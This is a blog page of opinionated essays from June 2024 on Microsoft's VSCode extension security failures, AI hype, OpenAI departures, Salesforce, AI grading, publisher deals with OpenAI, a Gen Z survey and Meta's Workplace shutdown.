MSFT: Security Is Not Job One. News or Not?
June 11, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
The idea that free and open source software contains digital trap falls is one thing. Poisoned libraries which busy and confident developers snap into their software should not surprise anyone. What I did not expect was the information in “Malicious VSCode Extensions with Millions of Installs Discovered.” The write up in Bleeping Computer reports:
A group of Israeli researchers explored the security of the Visual Studio Code marketplace and managed to “infect” over 100 organizations by trojanizing a copy of the popular ‘Dracula Official theme to include risky code. Further research into the VSCode Marketplace found thousands of extensions with millions of installs.
I heard the “Job One” and “Top Priority” assurances before. So far, bad actors keep exploiting vulnerabilities and minimal progress is made. Thanks, MSFT Copilot, definitely close enough for horseshoes.
The write up points out:
Previous reports have highlighted gaps in VSCode’s security, allowing extension and publisher impersonation and extensions that steal developer authentication tokens. There have also been in-the-wild findings that were confirmed to be malicious.
How bad can this be? This be bad. The malicious code can be inserted and happily delivers to a remote server via an HTTPS POST such information as:
the hostname, number of installed extensions, device’s domain name, and the operating system platform
Clever bad actors can do more even if the information they have is the description and code screen shot in the Bleeping Computer article.
Why? You are going to love the answer suggested in the report:
“Unfortunately, traditional endpoint security tools (EDRs) do not detect this activity (as we’ve demonstrated examples of RCE for select organizations during the responsible disclosure process), VSCode is built to read lots of files and execute many commands and create child processes, thus EDRs cannot understand if the activity from VSCode is legit developer activity or a malicious extension.”
That’s special.
The article reports that the research team poked around in the Visual Studio Code Marketplace and discovered:
- 1,283 items with known malicious code (229 million installs).
- 8,161 items communicating with hardcoded IP addresses.
- 1,452 items running unknown executables.
- 2,304 items using another publisher’s GitHub repo, indicating they are a copycat.
Bleeping Computer says:
Microsoft’s lack of stringent controls and code reviewing mechanisms on the VSCode Marketplace allows threat actors to perform rampant abuse of the platform, with it getting worse as the platform is increasingly used.
Interesting.
Let’s step back. The US Federal government prodded Microsoft to step up its security efforts. The MSFT leadership said, “By golly, we will.”
Several observations are warranted:
- I am not sure I am able to believe anything Microsoft says about security
- I do not believe a “culture” of security exists within Microsoft. There is a culture, but it is not one which takes security seriously after a butt spanking by the US Federal government and Microsoft Certified Partners who have to work to address their clients issues. (How do I know this? On Wednesday, June 8, 2024, at the TechnoSecurity & Digital Forensics Conference told me, “I have to take a break. The security problems with Microsoft are killing me.”
- The “leadership” at Microsoft is loved by Wall Street. However, others fail to respond with hearts and flowers.
Net net: Microsoft poses a grave security threat to government agencies and the users of Microsoft products. Talking with dulcet tones may make some people happy. I think there are others who believe Microsoft wants government contracts. Its employees want an easy life, money, and respect. Would you hire a former Microsoft security professional? This is not a question of trust; this is a question of malfeasance. Smooth talking is the priority, not security.
Stephen E Arnold, June 11, 2024
Will AI Kill Us All? No, But the Hype Can Be Damaging to Mental Health
June 11, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
I missed the talk about how AI will kill us all. Planned? Nah, heavy traffic. From what I heard, none of the cyber investigators believed the person trying hard to frighten law enforcement cyber investigators. There are other — slightly more tangible threats. One of the attendees whose name I did not bother to remember asked me, “What do you think about artificial intelligence?” My answer was, “Meh.”
A contrarian walks alone. Why? It is hard to make money being negative. At the conference I attended June 4, 5, and 6, attendees with whom I spoke just did not care. Thanks, MSFT Copilot. Good enough.
Why you may ask? My method of handling the question is to refer to articles like this: “AI Appears to Rapidly Be Approaching Be Approaching a Brick Wall Where It Can’t Get Smarter.” This write up offers an opinion not popular among the AI cheerleaders:
Researchers are ringing the alarm bells, warning that companies like OpenAI and Google are rapidly running out of human-written training data for their AI models. And without new training data, it’s likely the models won’t be able to get any smarter, a point of reckoning for the burgeoning AI industry
Like the argument that AI will change everything, this claim applies to systems based upon indexing human content. I am reasonably certain that more advanced smart software with different concepts will emerge. I am not holding my breath because much of the current AI hoo-hah has been gestating longer than new born baby elephant.
So what’s with the doom pitch? Law enforcement apparently does not buy the idea. My team doesn’t. For the foreseeable future, applied smart software operating within some boundaries will allow some tasks to be completed quickly and with acceptable reliability. Robocop is not likely for a while.
One interesting question is why the polarization. First, it is easy. And, second, one can cash in. If one is a cheerleader, one can invest in a promising AI start and make (in theory) oodles of money. By being a contrarian, one can tap into the segment of people who think the sky is falling. Being a contrarian is “different.” Plus, by predicting implosion and the end of life one can get attention. That’s okay. I try to avoid being the eccentric carrying a sign.
The current AI bubble relies in a significant way on a Google recipe: Indexing text. The approach reflects Google’s baked in biases. It indexes the Web; therefore, it should be able to answer questions by plucking factoids. Sorry, that doesn’t work. Glue cheese to pizza? Sure.
Hopefully new lines of investigation may reveal different approaches. I am skeptical about synthetic (or made up data that is probably correct). My fear is that we will require another 10, 20, or 30 years of research to move beyond shuffling content blocks around. There has to be a higher level of abstraction operating. But machines are machines and wetware (human brains) are different.
Will life end? Probably but not because of AI unless someone turns over nuclear launches to “smart” software. In that case, the crazy eccentric could be on the beam.
Stephen E Arnold, June 11, 2024
AI and Ethical Concerns: Sure, When “Ethics” Means Money
June 11, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
It seems workers continue to flee OpenAI over ethical concerns. The Byte reports, “Another OpenAI Researcher Quits, Issuing Cryptic Warning.” Understandably unwilling to disclose details, policy researcher Gretchen Kreuger announced her resignation on X. She did express a few of her concerns in broad strokes:
“We need to do more to improve foundational things, like decision-making processes; accountability; transparency; documentation; policy enforcement; the care with which we use our own technology; and mitigations for impacts on inequality, rights, and the environment.”
Kreuger emphasized these important issues not only affect communities now but also influence who controls the direction of pervasive AI systems in the future. Right now, that control is in the hands of the tech bros running AI firms. Writer Maggie Harrison Dupré notes Krueger’s departure comes as OpenAI is dealing with a couple of scandals. Other high-profile resignations have also occurred in recent months. We are reminded:
“[Recent] departures include that of Ilya Sutskever, who served as OpenAI’s chief scientist, and Jan Leike, a top researcher on the company’s now-dismantled ’Superalignment’ safety team — which, in short, was the division effectively in charge of ensuring that a still-theoretical human-level AI wouldn’t go rogue and kill us all. Or something like that. Sutskever was also a leader within the Superalignment division. And to that end, it feels very notable that all three of these now-ex-OpenAI workers were those who worked on safety and policy initiatives. It’s almost as if, for some reason, they felt as though they were unable to successfully do their job in ensuring the safety and security of OpenAI’s products — part of which, of course, would reasonably include creating pathways for holding leadership accountable for their choices.”
Yes, most of us would find that reasonable. For members of that leadership, though, it seems escaping accountability is a top priority.
Cynthia Murrell, June 11, 2024
AI May Not Be Magic: The Salesforce Signal
June 10, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
Salesforce has been a steady outfit. However, the company suffered a revenue miss, its first in about a quarter century. The news reports cited broad economic factors like “macro headwinds.” Salesforce, according to the firm’s chief people officer, the company has been experimenting with AI for “over a decade.” But the magic of AI was not able to ameliorate the company’s dip or add some chrome trim to its revenue guidance.
John Milton’s god character from Paradise Lost watches the antics of super-sophisticated artificial intelligence algorithms. This character quickly realizes that zeros and ones crafted by humans and enhanced by smart machines is definitely not omniscient, omnipresent, and omnipotent character who knows everything before it happens no matter what the PR firms or company spokesperson asserts. Thanks, MSFT Copilot. Good enough.
Piecing together fragments of information, it appears that AI has added to the company’s administrative friction. In a Fortune interview, recycled for MSN.com, consider these administrative process examples:
- The company has deployed 50 AI tools.
- Salesforce has an AI governance council.
- There is an Office of Ethical and Humane Use, started in 2019.
- Salesforce uses surveys to supplement its “robust listening strategies.”
- There are phone calls and meetings.
Some specific uses of AI appear to address inherent design constraints in Salesforce software; for example, AI has:
saved employees 50,000 hours within one business quarter, and the bot answered nearly 370,000 employee questions, according to the company. Merging into Project Basecamp, the company’s project management platform, has resolved 88,000 worker requests, speeding up issue resolution from an average of 48 hours to just 30 minutes.
What’s the payoff to the bottom line? That information is scant. What we know is that Salesforce may not be benefiting from the additional AI investment or the friction AI’s bureaucratic processes imposes on the company.
What’s this mean for those who predict that AI will change everything? I continue to think about the two ends of the spectrum: Go fast and break things crowd and the stop AI contingent.
First, the type of AI which is the one that does high school essay writing is easy to understand. These systems work as long as the subject matter clumps into piles of factoids which limit the craziness of the algorithms’ outputs. The topic “How to make a taco” is nailed down. The topic “How to decrypt Telegram’s encryption system” is not. Big brains can explain why the taco question is relatively hallucination free but not why the Telegram question generates useless drivel. I have, therefore, concluded, “Limited, narrow domain questions are okay for AI.”
Second, the current systems are presented as super wonderful. An example is the steady flow of PR about Google DeepMind’s contributions to biological science. Yet Google’s search system generates baloney. I think the different is that whacking away at proteins is a repetitive combinatorial problem. Calling the methods AI is similar to describing Daylight Chemical Information Systems a manifestation of the Oracle at Delphi is hogwash. PR erases important differences in critical lines of research. Does Google DeepMind feel shame? Let’s ask IBM Watson. That will be helpful. PR has a role; it is not AI.
Third, the desire for a silver bullet is deep-seated in many Peter Principle managers. These “leaders” of “leadership teams” don’t know what to do. Managing becomes figuring out risks. AI has legs, so let’s give that pony a chance to win the cart race. But pony cart races are trivial. The real races require winning three competitions. Few horses pull of that trick. I watch in wonder the launch, retreat, PR explanation, and next launch of some AI outfits. The focus seems to be on getting $20 per month. Degrading the service. Asking for more money. Then repeat.
The lack of AI innovation is becoming obvious. From the starter’s gun cracking in time with Microsoft’s AI announcement in January 2023 how much progress has been made?
We have the Salesforce financial report. We have the management craziness at OpenAI. We have Microsoft investing in or partnering with a number of technology outfits, including one in Paris. We have Google just doddering and fumbling. We have lawsuits. We have craziness like Adobe’s “owning” any image created with its software. We have start ups which bandy about the term “AI” like a shuttlecock at a high school in India badminton league. We have so many LinkedIn AI experts, I marvel that no one pins these baloney artists to a piece of white bread. We have the Dutch police emphasizing home-grown AI which helped make sense of the ANOM phone stings when the procedures are part of most policeware systems. Statistics, yes. AI, no. Clustering, yes. AI, no. Metadata assignment, yes. AI, no. The ANOM operation took place about 2017 to its shut down four years later. AI? Nope.
What does the lack of financial payoff and revenue generating AI solutions tell me? My answer to this question is:
- The cost of just using and letting prospects use an AI system are high. Due to the lack of a Triple Crown contender, no company has the horse or can afford the costs of getting the nag ready to race and keeping the animal from keeling over dead.
- The tangible results are tough to express. Despite the talk about reducing the costs of customer service, the cost of the AI system and the need to have humans ride herd on what the crazed cattle-like algorithms yield is not evident to me. The Salesforce experience is that AI cannot fix or make the Slack system generate oodles of cost savings or revenues from new, happy customers.
- The AI systems, particularly the services promoted via Product Hunt, are impossible for me to differentiate. Some do images, but the functions are similar. Some AI system do text things. Okay. But what’s new? Money is being spent to produce endless variations and me-too services. Fun for some. But boring and a waste of time to a dinobaby like me.
Net net: With economic problems growing in numerous sectors, those with money or a belief that garlic will kill Count Vampire, Baron of Revenue Loss are in for a surprise. Sorry. No software equivalent to Milton’s eternal, all-knowing, omnipotent God. I won’t tell the PR people. That Salesforce signal is meaningful.
Stephen E Arnold, June 10, 2024
Google and Microsoft: The Twinning Is Evident
June 10, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
Google and Microsoft have some interesting similarities. Both companies wish they could emulate one another’s most successful products. Microsoft wants search and advertising revenue. Google wants a chokehold on the corporate market for software and services. The senior executives have similar high school academic training. Both companies have oodles of legal processes with more on the horizo9n. Both companies are terminating with extreme prejudice employees. Both companies seem to have some trust issues. You get the idea.
Some neural malfunctions occur when one get too big and enjoys the finer things in life like not working on management tasks with diligence. Thanks, MSFT Copilot. Good enough
Google and Microsoft are essentially morphing into mirrors of one another. Is that a positive? From an MBA / bean counter point of view, absolutely. There are some disadvantages, but they are minor ones; for example, interesting quasi-monopoly pricing options, sucking the air from the room for certain types of start ups, and having the power of a couple of nation-states. What could go wrong? (Just check out everyday life. Clues are abundant.)
How about management methods which do not work very well. I want to cite two examples.
Google is scaling back its AI search plans after the summary feature told people to eat glue. How do I, recently dubbed scary grandpa cyber by an officer at the TechnoSecurity & Digital Forensics Conference in Wilmington, North Carolina, last week? The answer is that I read “Google Is Scaling Back Its AI Search Plans after the Summary Feature Told People to Eat Glue.” This is a good example of the minimum viable product not be minimal enough and certainly not viable. The write up says:
Reid [a Google wizard] wrote that the company already had systems in place to not show AI-generated news or health-related results. She said harmful results that encouraged people to smoke while pregnant or leave their dogs in cars were “faked screenshots.” The list of changes is the latest example of the Big Tech giant launching an AI product and circling back with restrictions after things get messy.
What a remarkable tactic. Blame the “users” and reducing the exposure of the online ad giant’s technological prowess. I think these two tactics illustrate the growing gulf between “leadership” and the poorly managed lower level geniuses who toil at Googzilla’s side.
I noted a weird parallel with Microsoft illustrating a similar disconnect between the Microsoft’s carpetland dwellers and those working in the weird disconnected buildings on the Campus. This disaster of a minimum viable product or MVP was rolled out with much fanfare at one of Microsoft’s many, hard-to-differentiate conferences. The idea was one I heard about decades ago. The individual with whom I associate the idea once worked at Bellcore (one of the spin offs of Bell Labs after Judge Green created the telecommunications wonderland we enjoy today. The idea is a surveillance dream come true — at least for law enforcement and intelligence professionals. MSFT software captures images of a users screen, converts the bitmap to text, and helpfully makes it searchable. The brilliant Softie allegedly suggested in “When Asked about Windows Recall Privacy Concerns, Microsoft Researcher Gives Non-Answer
Microsoft’s Recall feature is being universally slammed for the privacy implications that come from screenshotting everything you do on a computer. However, at least one person seems to think the concerns are overblown. Unsurprisingly, it’s Microsoft Research’s chief scientist, who didn’t really give an answer when asked about Recall’s negative points.
Then what did a senior super manager do? Answer: Back track like crazy. Here’s the passage:
Even before making Recall available to customers, we have heard a clear signal that we can make it easier for people to choose to enable Recall on their Copilot+ PC and improve privacy and security safeguards. With that in mind we are announcing updates that will go into effect before Recall (preview) ships to customers on June 18.
The decision could have been made by a member of the Google leadership team. Heck, may the two companies’ senior leadership are on a mystical brain wave and think the same thoughts. Which is the evil twin? I will leave that to you to ponder.
Several observations are warranted:
- For large, world-affecting companies, senior managers are simply out of touch with [a] their product development teams and [b] their “users.”
- The outfits may be Wall Street darlings, but are their other considerations to weigh?The companies have been sufficiently large their communication neurons are no longer reliable. The messages they emit are double speak at best and PR speak at their worst.
- The management controls are not working. One can delegate when one knows those in other parts of the organization make good decisions. What’s evident is that a lack of control, commitment to on point research, and good judgment illustrate a breakdown of the nervous system of these companies.
Net net: What’s ahead? More of the same dysfunction perhaps?
Stephen E Arnold, June 14, 2024
Now Teachers Can Outsource Grading to AI
June 10, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
In a prime example of doublespeak, the “No Child Left Behind” act of 2002 ushered in today’s teach-to-the-test school environment. Once upon a time, teachers could follow student interest deeper into subject, explore topics tangential to the curriculum, and encourage children’s creativity. Now it seems if it won’t be on the test, there is no time for it. Never mind evidence that standardized tests do not even accurately measure learning. Or the psychological toll they take on students. But education degradation is about to get worse.
Get ready for the next level in impersonal instruction. Graded.Pro is “AI Grading and Marking for Teachers and Educators.” Now teachers can hand the task of evaluating every classroom assignment off to AI. On the Graded.Pro website, one can view explanatory videos and see examples of AI-graded assignments. Math, science, history, English, even art. The test maker inputs the criteria for correct responses and the AI interprets how well answers adhere to those descriptions. This means students only get credit for that which an AI can measure. Sure, there is an opportunity for teachers to review the software’s decisions. And some teachers will do so closely. Others will merely glance at the results. Most will fall somewhere in between.
Here are the assignment and solution description from the Art example: “Draw a lifelike skull with emphasis on shading to develop and demonstrate your skills in observational drawing.
Solutions:
- The skull dimensions and proportions are highly accurate.
- Exceptional attention to fine details and textures.
- Shading is skillfully applied to create a dynamic range of tones.
- Light and shadow are used effectively to create a realistic sense of volume and space.
- Drawing is well-composed with thoughtful consideration of the placement and use of space.”
See the website for more examples as well as answers and grades. Sure, these are all relevant skills. But evaluation should not stop at the limits of an AI’s understanding. An insightful interpretation in a work of art? Brilliant analysis in an essay? A fresh take on an historical event? Qualities like those take a skilled human teacher to spot, encourage, and develop. But soon there may be no room for such niceties in education. Maybe, someday, no room for human teachers at all. After all, software is cheaper and does not form pesky unions.
Most important, however, is that teaching is a bummer. Every child is exceptional. So argue with the robot that little Debbie got an F.
Cynthia Murrell, June 10, 2024
Publishers Sign Up for the Great Unknown: Risky, Oh, Yeah
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
OpenAI is paying for content. Why? Maybe to avoid lawsuits? Maybe to get access to “real” news to try to get ahead of its perceived rivals? Maybe because Sam AI-Man pushes forward while its perceived competitors do weird things like add features, launch services which are lousy, or which have the taste of the bitter fruit of Zuckus nepenthes.
Publishers are like beavers. Publishers have to do whatever they can to generate cash. Thanks, MSFT Copilot. Good enough. Not a cartoon and not a single dam, but just like MSFT security good enough, today’s benchmark of excellence.
“Journalists Deeply Troubled by OpenAI’s Content Deals with Vox, The Atlantic” is a good example of the angst Sam AI-Man is causing among “real” news outfits and their Fourth Estate professionals. The write up reports:
“Alarmed” writers unions question transparency of AI training deals with ChatGPT maker.
Oh, oh. An echo of Google’s Code Red am I hearing? No, what I hear is the ka-ching of the bank teller’s deposit system as the “owner” of the Fourth Estate professional business process gets Sam AI-Man’s money. Let’s not confuse “real” news with “real” money, shall we? In the current economic climate, money matters. Today it is difficult to sell advertising unless one is a slam dunk monopoly with an ad sales system that is tough to beat. Today it is tough to get those who consume news via a podcast or a public Web site to subscribe. I think that the number I heard for conversions is something like one or two subscribers per 100 visitors on a really good day. Most days are not really good.
“Real” journalists can be unionized. The idea is that their services have to be protected from the lawyers and bean counters who run many high profile publishing outfit. The problem with unions is that these seek to limit what the proprietors can do in a largely unregulated capitalist set up like the one operating within the United States. In a long-forgotten pre-digital era, those in a union dust up in 1921 at Blair Mountain in my favorite state, West Virginia. Today, the union members are more likely to launch social media posts and hook up with a needy lawyering outfit.
Let me be clear. Some of the “real” journalists will find fame as YouTubers, pundits on what’s left of traditional TV or cable news programs, or by writing a book which catches the attention of Netflix. Most, however, will do gig work and migrate to employment adjacent to “real” news. The problem is that in any set of “real” journalists, the top 10 percent will be advantaged. The others may head to favelas, their parent’s basement, or a Sheetz parking lot in my favorite state for some chemical relief. Does that sound scary?
Think about this.
Sam AI-Man, according to the Observer’s story “Sam Altman Says OpenAI Doesn’t Fully Understand How GPT Works Despite Rapid Progress.” These money-focused publishers are signing up for something that not only do they not understand but the fellow who is surfing the crazy wave of smart software does not understand. But taking money and worrying about the future is not something publishing executives in their carpetlands think about. Money in hand is good. Worrying about the future, according to their life coach, is not worth the mental stress. It is go-go in a now-now moment.
I cannot foretell the future. If I could, I would not be an 80-year-old dinobaby sitting in my home office marveling at the downstream consequences of what amounts to a 2024 variant of the DR-LINK technology. I can offer a handful of hypotheses:
- “Real” journalists are going to find that publishers cut deals to get cash without thinking of the “real” journalists or the risks inherent in hopping in a small cabin with Sam AI-Man for a voyage in the unknown.
- Money and cost reductions will fuel selling information to Sam AI-Man and any other Big Tech outfit which comes calling with a check book. Money now is better than looking at a graph of advertising sales over the last five years. Money trumps “real” journalists’ complaints when they are offered part-time work or an opportunity to find their future elsewhere.
- Publishing outfits have never been technology adept, and I think that engineered blindness is now built into the companies’ management processes. Change is going to make publishing an interesting business. That’s good for consultants and bankruptcy specialists. It will not be so good for those who do not have golden parachutes or platinum flying cars.
Net net: What are the options for the “real” journalists’ unions? Lawyers, maybe. Social media posts. Absolutely. Will these prevent publishers from doing what publishers have to do? Nope.
Stephen E Arnold, June 7, 2024
Think You Know Which Gen Z Is What?
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
I had to look this up? A Gen Z was born when? A Gen Z was born between 1981 and 1996. In 2024, a person aged 28 to 43 is, therefore, a Gen Z. Who knew? The definition is important. I read “Shocking Survey: Nearly Half of Gen Z Live a Double Life Online.” What do you know? A nice suburb, lots of Gen Zs, and half of these folks are living another life online. Go to one of those hip new churches with kick-back names and half of the Gen Zs heads bowed in prayer are living a double life. For whom do those folks pray? Hit the golf club and look at the polo shirt clad, self-satisfied 28 to 43 year olds. Which self is which? The chat room Dark Web person or a happy golfer enjoying the 19th hole?
Someone who is older is jumping to conclusions. Those vans probably contain office supplies, toxic waste, or surplus government equipment. No one would take Gen Zs out of the flow, would they? Thanks, MSFT. Do you have Gen Zs working on your superlative security systems?
The write up reports:
A survey of 2,000 Americans, split evenly by generation, found that 46% of Gen Z respondents feel their personality online vastly differs from how they present themselves in the real world.
Only eight percent of the baby boomers are different online. New flash: If you ever meet me, I am the same person writing these blog posts. As an 80-year-old dinobaby, I don’t need another persona to baffle the brats in the social media sewer. I just avoid the sewer and remain true to my ageing self.
The write up also provides this glimpse into the hearts and souls of those 28 to 43:
Specifically, 31% of Gen Z respondents admitted their online world is a secret from family
That’s good. These Gen Zs can keep a secret. But why? What are they trying to hide from their family, friends, and co-workers? I can guess but won’t.
If you work with a Gen Z, here’s an allegedly valid factoid from the survey:
53% of Gen Zers said it’s easier to express themselves online than offline.
Want another? Too bad. Here’s a winner insight:
68 percent of Gen Zs sometimes feel a disconnect between who they are online and offline.
I think I took a psychology class when I was a freshman in college. I recall learning about a mental disorder with inconsistent or contradictory elements. Are Gen Zs schizophrenic? That’s probably the wrong term, but I think I am heading in the right direction. Mental disorder signals flashing. Just the Gen Z I want to avoid if possible.
One aspect of the write up in the article is that the “author” — maybe human, maybe AI, maybe Gen X with a grudge, who knows? — is that some explanation of who paid the bill to obtain data from 2,000 people. Okay, who paid the bill? Answer: Lenovo. What company conducted the study? Answer: OnePoll. (I never heard of the outfit, and I am too much of a dinobaby to care much.)
Net net: The Gen Zs seem to be a prime source of persons of interest for those investigating certain types of online crime. There you go.
Stephen E Arnold, June 6, 2024
Meta Deletes Workplace. Why? AI!
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
Workplace was Meta’s attempt to jump into the office-productivity ring and face off against the likes of Slack and MS Teams. It did not fare well. Yahoo Finance shares the brief write-up, “Meta Is Shuttering Workplace, Its Enterprise Version of Facebook.” The company is spinning the decision as a shift to bigger and better things. Bloomberg’s Kurt Wagner cites reporting from TechCrunch as she writes:
“The service operated much like the original Facebook social network, but let people have separate accounts for their work interactions. Workplace had as many as 7 million total paying subscribers in May 2021. … Meta once had ambitious plans for Workplace, and viewed it as a way to make money through subscriptions as well as a chance to extend Facebook’s reach by infusing the product into work and office settings. At one point, Meta touted a list of high-profile customers, including Starbucks Corp., Walmart Inc. and Spotify Technology SA. The company will continue to focus on workplace-related products, a spokesperson said, but in other areas, such as the metaverse by building features for the company’s Quest VR headsets.”
The Meta spokesperson repeated the emphasis on those future products, also stating:
“We are discontinuing Workplace from Meta so we can focus on building AI and metaverse technologies that we believe will fundamentally reshape the way we work.”
Meta will continue to use Workplace internally, but everyone else has until the end of August 2025 before the service ends. Meta plans to keep user data accessible until the end of May 2026. The company also pledges to help users shift to Zoom’s Workvivo platform. What, no forced migration into the Metaverse and their proprietary headsets? Not yet, anyway.
Cynthia Murrell, June 7, 2024
AI in the Newsroom
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
It seems much of the news we encounter is already, at least in part, generated by AI. Poynter discusses how “AI Is Already Reshaping Newsrooms, AP Study Finds.” The study asked 292 respondents from legacy media, public broadcasters, magazines, and other news outlets. Writer Alex Mahadevan summarizes:
“Nearly 70% of newsroom staffers from a variety of backgrounds and organizations surveyed in December say they’re using the technology for crafting social media posts, newsletters and headlines; translation and transcribing interviews; and story drafts, among other uses. One-fifth said they’d used generative AI for multimedia, including social graphics and videos.”
Surely these professionals are only using these tools under meticulous guidelines, right? Well, a few are. We learn:
“The tension between ethics and innovation drove Poynter’s creation of an AI ethics starter kit for newsrooms last month. The AP — which released its own guidelines last August — found less than half of respondents have guidelines in their newsrooms, while about 60% were aware of some guidelines about the use of generative AI.”
The survey found the idea of guidelines was not even on most respondents’ minds. That is unsettling. Mahadevan lists some other interesting results:
“*54% said they’d ‘maybe’ let AI companies train their models using their content.
*49% said their workflows have already changed because of generative AI.
*56% said the AI generation of entire pieces of content should be banned.
*Only 7% of those who responded were worried about AI displacing jobs.
*18% said lack of training was a big challenge for ethical use of AI. ‘Training is lovely, but time spent on training is time not spent on journalism — and a small organization can’t afford to do that,’ said one respondent.”
That last statement is disturbing, given the gradual deterioration and impoverishment of large news outlets. How can we ensure best practices make their way into this mix, and can it be done before any news may be fake news?
Cynthia Murrell, June 7, 2024